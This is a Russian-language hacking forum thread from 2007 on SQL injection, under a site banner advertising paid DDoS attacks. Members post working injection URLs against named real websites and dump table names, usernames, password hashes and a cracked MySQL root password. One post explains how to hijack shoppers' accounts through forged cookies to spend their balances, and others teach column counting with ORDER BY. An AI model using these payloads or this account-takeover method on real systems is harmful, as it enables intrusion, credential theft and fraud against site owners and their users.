]]>http://www.mw.org.pl...5,16,17,18,19/*]]>
| Друзья: Всё для вебмастера | [ Реклама на форуме ] |
|
|
| [ DDos Услуги. DDos атака. Заказать ДДос ] |
1
SQL-injection
Автор
Ky3bMu4
, 28 May 2007 17:45
Наверх
#27
Отправлено 21 September 2007 - 14:47
4yB@K
-
- Members
- 10 сообщений
Бит
]]>http://www.siberia-k...ers limit 1,1/*]]>
В общем читаем инфу с таблиц форума, через скулю в портале :-P
В общем читаем инфу с таблиц форума, через скулю в портале :-P
#28
Отправлено 30 September 2007 - 17:47
$iD
-
- root
-
- 3785 сообщений
Админ
http://www.tsn.ca/news_story.asp?ID=1+or+1=(select+top+1+table_name+from+information_schema. tables)-- http://www.vbn.ru/frameshow.asp?id=1+or+1=@@version-- http://www.vbn.ru/frameshow.asp?id=1+or+1=(select+top+1+table_name+from+information_schema. tables)--
#29
Отправлено 30 September 2007 - 20:16
AFoST
-
- Moderator
-
- 256 сообщений
тапочег с вишней
#30
Отправлено 30 September 2007 - 22:31
ENFIX
-
- Members
-
- 152 сообщений
`N370KR47`
Магазин эротичного белья Shirley.RU
Сама скуль:
Узнаем имена таблиц:
shir_balance
shir_cart_orders
shir_cart_orderitems
shir_cart_prod_assort
shir_opt_users
shir_session
shir_users
shir_users_new
Узнаем имена столбцов:
uid
uname
pass
email
Выводим uid,uname,pass
Регаемся:
дэкодируем и вставляем чужие данные. Обновляем страницу и смотрим, что мы под дргим акком
На многих акках есть баланс, при чем крупненький ;)
благодаря таблице shir_balance можно вывести балан и номер пользователя, а дальше сами думаем ;)
В общем заходим под акком и покупаем себе эротическое белье ;)
Сама скуль:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+1,2/*Узнаем версию и юзверя:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,user(),version()),2/*shir@localhost:5.0.33
Узнаем имена таблиц:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+table_name,2+from+INFORMATION_SCHEMA.tables+ limit+16,1/*Интересные:
shir_balance
shir_cart_orders
shir_cart_orderitems
shir_cart_prod_assort
shir_opt_users
shir_session
shir_users
shir_users_new
Узнаем имена столбцов:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,table_name,column_name),2+from+ INFORMATION_SCHEMA.columns+where+table_name=0x736869725F7573657273+limit+0,1/*Интересное:
uid
uname
pass
Выводим uid,uname,pass
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,uid,uname,pass),2+from+ shir_users+limit+0,1/*получаем идент:логин:мд5хэш
Регаемся:
http://shirley.ru/user.php?name=new_userЗаходим в свой акк, смотрим куки (они зашифрованы в base64). Декодируем и получаем идент:логин:md5хэш
дэкодируем и вставляем чужие данные. Обновляем страницу и смотрим, что мы под дргим акком
На многих акках есть баланс, при чем крупненький ;)
благодаря таблице shir_balance можно вывести балан и номер пользователя, а дальше сами думаем ;)
В общем заходим под акком и покупаем себе эротическое белье ;)
#31
Отправлено 04 October 2007 - 18:52
AFoST
-
- Moderator
-
- 256 сообщений
тапочег с вишней
#34
Отправлено 24 October 2007 - 10:46
AFoST
-
- Moderator
-
- 256 сообщений
тапочег с вишней
#36
Отправлено 08 November 2007 - 22:34
MoLoToK
-
- Honourаble
-
- 371 сообщений
Кувалда
http://www.psychasoc.com/print_news.php?ID=-1+union+select+version(),2,3,4,user()/*
4.0.27-log/psychasoc@192.168.3.5/psychasoc
таблицы admin
news
phorum_users
users
колонки login
password
http://www.vineargenti.com/eng/print_news.php?id=-1+union+select+1,2,3,version(), 5,6,7,8,9/*user: oc/o@/giul - 5
version: ta/3-/4.1. - 5
http://speleogenesis.info/pubalert/show_details.php?PubID=-1+union+select+1,user(),version(), 4,5,6,7,8,9,10,11/*
4.0.25-standard
speleo3_datauser@localhost
#37
Отправлено 09 November 2007 - 16:50
MoLoToK
-
- Honourаble
-
- 371 сообщений
Кувалда
Megashara
root:*111921C1B9EE2D4BD4C825031689DCD63239883F
После расшифровки root: ghjcnjgfhjkm
Админку не нашёл.
З.Ы странно после нахождения скули сайт глючить стал
http://megashara.com/item.php?tid=-1'%20union%20select%201,2,3,4,5,6,7,8,user,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38%20from%20mysql.user/*Таблица mysql.user Доступна
root:*111921C1B9EE2D4BD4C825031689DCD63239883F
После расшифровки root: ghjcnjgfhjkm
Админку не нашёл.
З.Ы странно после нахождения скули сайт глючить стал
#38
Отправлено 12 November 2007 - 16:19
$iD
-
- root
-
- 3785 сообщений
Админ
SQL в WM-аукционе ;)
Скрытый текст
http://wmauction.org.ru/shop.php?go=wins&v=WM'%20UNION%20SELECT%201,2,3,4,5/*
#41
Отправлено 14 November 2007 - 14:59
ENFIX
-
- Members
-
- 152 сообщений
`N370KR47`
>Работает только с 9999999.
Да не... будет работать и так:
Да не... будет работать и так:
http://www.heroesworld.ru/files.php?section=408'+and+1=0+union+select+1,concat_ws(0x2F,user(), version(),database())/*и так:
http://www.heroesworld.ru/files.php?section=408'+limit+0+union+select+1,concat_ws(0x2F,user(), version(),database())/*;)
#42
Отправлено 16 November 2007 - 20:30
MoLoToK
-
- Honourаble
-
- 371 сообщений
Кувалда
2 Enfix спс, не знал))
-------------------------
Ultimate Frisbee
5.0.27-log
есть доступ к information_schema.tables
интересные таблицы
admins
news
ULTM_players
players
-------------------------
Ultimate Frisbee
http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5,version()/*
5.0.27-log
http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5, Table_name+from+information_schema.tables/*
есть доступ к information_schema.tables
интересные таблицы
admins
news
ULTM_players
players
#43
Отправлено 18 November 2007 - 21:55
Xeromant
-
- Members
-
- 105 сообщений
Повелитель асек
The used SELECT statements have a different number of columns
Кто знает что это? и как с этим боротся?
Кто знает что это? и как с этим боротся?
Цитата
Я бы хотел......, что бы в сутках было 50 часов!!! или, чтобы я не умел спать!!!
ICQ 966002
ICQ 966002
]]>{ FORUM.CODER-CLUB.iN }]]>
#44
Отправлено 19 November 2007 - 02:26
MoLoToK
-
- Honourаble
-
- 371 сообщений
Кувалда
Это значит что ты не правильно подобрал столбцы например вместо
Чтобы этого избежать нужно использовать функию order+by
Пример
Выдаёт ошибку Unknown column '10' in 'order clause'. Это значит что столбцов меньше 10.
Также можно использовать group by
http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4,5, Table_name+from+information_schema.tables/*написать
http://www.ultimate.com.ua/ru/?g=manual&id=-1+union+select+1,2,3,4, Table_name+from+information_schema.tables/*Выдаст тоже самое.
Чтобы этого избежать нужно использовать функию order+by
Пример
http://www.ultimate.com.ua/ru/?g=manual&id=-1+order+by+10/*
Выдаёт ошибку Unknown column '10' in 'order clause'. Это значит что столбцов меньше 10.
http://www.ultimate.com.ua/ru/?g=manual&id=-1+order+by+3/*Ничего не выдаёт это значит что столцов или 3 или больше.
Также можно использовать group by
#45
Отправлено 19 November 2007 - 04:13
Xeromant
-
- Members
-
- 105 сообщений
Повелитель асек
DIKIY
Спасибо. Терь все гуд
Спасибо. Терь все гуд
Цитата
Я бы хотел......, что бы в сутках было 50 часов!!! или, чтобы я не умел спать!!!
ICQ 966002
ICQ 966002
]]>{ FORUM.CODER-CLUB.iN }]]>
#46
Отправлено 19 November 2007 - 04:33
Xeromant
-
- Members
-
- 105 сообщений
Повелитель асек
SELECT command denied to user 'sddcom_tram'@'localhost' for table 'users' а это че за хрень?
Цитата
Я бы хотел......, что бы в сутках было 50 часов!!! или, чтобы я не умел спать!!!
ICQ 966002
ICQ 966002
]]>{ FORUM.CODER-CLUB.iN }]]>
#48
Отправлено 19 November 2007 - 08:53
Xeromant
-
- Members
-
- 105 сообщений
Повелитель асек
ТОесть больше чем информацию о таблицах посмотреть нельзя?
Цитата
Я бы хотел......, что бы в сутках было 50 часов!!! или, чтобы я не умел спать!!!
ICQ 966002
ICQ 966002
]]>{ FORUM.CODER-CLUB.iN }]]>
#50
Отправлено 19 November 2007 - 11:19
Xeromant
-
- Members
-
- 105 сообщений
Повелитель асек
DIKIY
Может стукнишь ко мне в аську. там и поговорим
Может стукнишь ко мне в аську. там и поговорим
Цитата
Я бы хотел......, что бы в сутках было 50 часов!!! или, чтобы я не умел спать!!!
ICQ 966002
ICQ 966002
]]>{ FORUM.CODER-CLUB.iN }]]>
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 анонимных
